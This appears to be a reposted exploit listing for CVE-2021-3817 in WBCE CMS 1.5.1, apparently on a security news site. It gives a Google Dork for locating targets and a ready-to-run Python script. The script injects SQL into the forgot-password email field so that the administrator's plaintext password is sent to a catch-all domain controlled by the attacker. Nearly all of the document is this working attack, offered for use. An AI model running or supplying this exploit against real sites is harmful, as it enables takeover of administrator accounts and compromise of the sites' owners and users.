EXPLOIT
# Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset
# Google Dork: intext: "Way Better Content Editing"
# Exploit Author: citril or https://github.com/maxway2021
# Vendor Homepage: https://wbce.org/
# Software Link: https://wbce.org/de/downloads/
# Version: <= 1.5.1
# Tested on: Linux
# CVE : CVE-2021-3817
# Github repo: https://github.com/WBCE/WBCE_CMS
# Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75
import requests
_url = 'http://localhost/wbce/admin/login/forgot/index.php' # from mylocalhost environment
_domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature
headers = {
'User-Agent': 'Mozilla/5.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'close'
}
_p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"
r = requests.post(url = _url, headers = headers, data = _p)
if r.status_code == 200:
print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')
British high street chain WH Smith has recently revealed that it was hit by a…
As banks worldwide roll out Voice ID as a means of user authentication over the…
In the era of digital transformation, cybersecurity has become a major concern for businesses. When…
In today's digital age, cybersecurity threats have become a significant concern for businesses of all…
The RIG Exploit Kit is currently in the midst of its most productive phase, attempting…
One of the most transformational technologies of our time, artificial intelligence (AI), has quickly come…
Leave a Comment